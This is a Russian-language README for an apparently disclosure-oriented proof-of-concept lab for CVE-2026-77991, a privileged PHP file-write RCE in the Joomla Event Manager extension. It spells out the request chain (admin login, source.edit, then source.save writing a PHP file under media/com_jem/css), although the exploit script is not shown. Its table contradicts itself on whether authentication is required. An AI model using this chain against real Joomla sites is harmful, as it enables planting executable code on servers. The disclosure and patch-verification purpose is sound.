
Proof-of-concept и лабораторный пакет для CVE-2026-77991 — привилегированного RCE через запись файлов на PHP в Joomla Event Manager до версии 5.0.0 включительно, с Docker-лабораторией и проверкой witness.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-77991
JEM - Joomla Event Manager 5.0.0 — joomlaeventmanager.net
Joomla Extension - joomlaeventmanager.net - Привилегированное удалённое выполнение кода в Joomla Event Manager < 5.0.1 - Модель источника администратора позволяет записывать опасные типы файлов, включая PHP, что приводит к удалённому выполнению кода.
| CVE | CVE-2026-77991 · CVE.org |
| CWE | — |
| CVSS | см. advisory |
| Продукт | JEM - Joomla Event Manager |
| Затронуто | все версии по 5.0.0 (включительно) |
| Исправлено | 5.0.1 и новее |
| Аутентификация | отсутствует (см. карту исходников) |
| Лаборатория | только 127.0.0.1 · пакет для раскрытия вендору/клиенту, не сканер |
В advisory указана модель источника администратора. HTTP — это com_jem task=source.save, а не ajax action=. PHP-метод save() — это не URL. PR:H — неаутентифицированный POST — это не данный CVE.
POST/administrator/index.phpPOST /administrator/index.php login (admin/labadmin)GET /administrator/index.php?option=com_jem&task=source.edit&id=<base64 poc_witness.php> (JemControllerSource::edit)POST option=com_jem task=source.save jform[filename]+jform[source]+token (controllers/source.php:136)JemModelSource::save File::write media/com_jem/css/<file> (models/source.php:359-396)GET /media/com_jem/css/poc_witness.phpGET /media/com_jem/css/poc_witness.php возвращает POC_WITNESS_77991. Вход с кодом 200 HTML или ошибка токена — это не он.
Сделайте это в первую очередь: обновите JEM - Joomla Event Manager до 5.0.1 или новее.
Проверка после обновления
CVE-2026-77991-Abraxas-Labs.py против пропатченной сборки: сопоставленный свидетель не должен появляться.Если вы не можете обновиться немедленно
Цель — только http://127.0.0.1:8088 (или loopback, который вы привязали). Не направляйте этот скрипт в интернет.
python3 CVE-2026-77991-Abraxas-Labs.py
Успех — это свидетель выше в теле ответа. Обычный HTML с кодом 200 — это не он.
Loopback-стек, использованный для воспроизведения. Официальные образы, если только Dockerfile в этой папке не собирает из исходников.
cd lab
docker compose up --force-recreate
Примонтируйте дерево уязвимого продукта рядом с Compose, если YAML монтирует локальный каталог (zip плагина / тег исходников из таблицы версий). Публикуйте только 127.0.0.1.
# CVE-2026-77991 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-77991`
- CWE: n/a
- published: n/a
## NVD description
error: <urlopen error [Errno 8] nodename nor servname provided, or not known>
## MITRE description
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
## Affected
- joomlaeventmanager.net JEM - Joomla Event Manager extension for Joomla 1.0.0-5.0.0 affected
## References (JSON sources only)
- https://www.joomlaeventmanager.net/
- https://github.com/advisories/GHSA-gh3c-9wwf-mj2v
- https://nvd.nist.gov/vuln/detail/CVE-2026-77991
- https://www.joomlaeventmanager.net
## GitHub advisory
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event...
Joomla Extension - joomlaeventmanager.net - Privileged remote code execution in Joomla Event Manager < 5.0.1 - The administrator source model allows to write dangerous file type incl. PHP, leading to remote code execution.
Этот пакет предназначен для вендора, владельца сайта и лицензированных лабораторий. Скрипт обращается к 127.0.0.1. Использование его против систем, которыми вы не владеете, не авторизовано Abraxas Labs. Без гарантий.